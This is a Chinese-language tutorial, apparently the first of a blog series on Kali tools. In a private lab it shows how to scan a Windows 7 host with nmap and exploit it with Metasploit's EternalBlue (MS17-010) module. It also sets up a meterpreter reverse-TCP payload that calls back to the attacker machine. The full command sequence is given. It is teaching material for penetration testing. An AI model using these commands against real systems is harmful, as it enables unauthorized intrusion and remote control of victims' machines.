由于mesploit框架十分巨大,我把它分为了三个部分:漏洞利用,木马利用,后渗透阶段。

metaspliot简介

metaspliot是一个漏洞框架,全称为The Metasploit  Framework,简称为MSF。

流程需求

  • kali攻击机             192.168.3.26
  • windows 7靶机    192.168.3.28   

实例演示

1.使用nmap进行扫描

使用nmap进行SYN扫描,得到目标开放的端口、端口服务的版本信息以及操作系统版本。

 nmap -sS -sV -O 192.168.3.28

metaspliot漏洞利用

2.使用search命令搜索攻击模块

图中我们可以看到目标445端口是开放状态,而445端口典型漏洞就是ms17_010,我们使用search命令进行搜索可用的攻击模块

metaspliot漏洞利用

3.使用use调用攻击模块

use exploit/windows/smb/ms17_010_eternalblue

metaspliot漏洞利用

4.设置攻击参数

运行命令"show options"。(rhosts 代表目标主机IP地址,rport代表目标主机端口)

metaspliot漏洞利用

设置目标主机IP地址

set   rhosts  192.168.3.28

metaspliot漏洞利用

5.选择攻击所使用的payload

运行命令"show  payloads" ,查看metasploit集成的payload。

在选择攻击payload时,建议使用和meterpreter和reverse相关的payload。(meterpreter在metasploit中有着瑞士军刀的称号)

metaspliot漏洞利用

选择我们要使用的payload。

set  payload  windows/x64/meterpreter/reverse_tcp

metaspliot漏洞利用

查看payload的配置信息

show  options

metaspliot漏洞利用

设置回连IP地址。(即本机IP地址)

set  lhost   192.168.3.26

metaspliot漏洞利用

6.渗透攻击

在完成所有配置信息时,我们再次运行"show options"检验配置是否正确。

metaspliot漏洞利用

检验正确后,然后执行命令"run"。

metaspliot漏洞利用

到这里就完成了mesploit漏洞利用的介绍,如果想了解更多的Kali工具,请关注我!

 

 

 

相关文章: